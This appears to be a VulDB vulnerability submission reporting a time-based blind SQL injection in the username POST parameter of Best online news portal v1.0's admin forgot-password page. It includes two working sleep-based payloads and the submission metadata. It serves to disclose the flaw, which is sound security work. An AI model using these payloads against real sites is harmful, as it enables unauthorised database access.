| Title | Best online news portal v1.0 /101news/admin/forgot-password.php POST parameter username exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in Best online news portal v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /101news/admin/forgot-password.php post parameter username.
Payload1:username=a' and (select 1 from (select(sleep(10)))a) AND 'a'='a&email=b&confirmpassword=c&newpassword=d&submit=
Payload2:username=a' and (select 1 from (select(sleep(15)))a) AND 'a'='a&email=b&confirmpassword=c&newpassword=d&submit=
|
|---|
| Source | ⚠️ https://github.com/PEOIzEve/bug_report/blob/main/SQLi-1.md |
|---|
| User | PEOIzEve (UID 44579) |
|---|
| Submission | 04/09/2023 09:27 (3 years ago) |
|---|
| Moderation | 04/09/2023 09:48 (20 minutes later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 225361 [SourceCodester Best Online News Portal 1.0 POST Parameter forgot-password.php Username sql injection] |
|---|
| Points | 20 |
|---|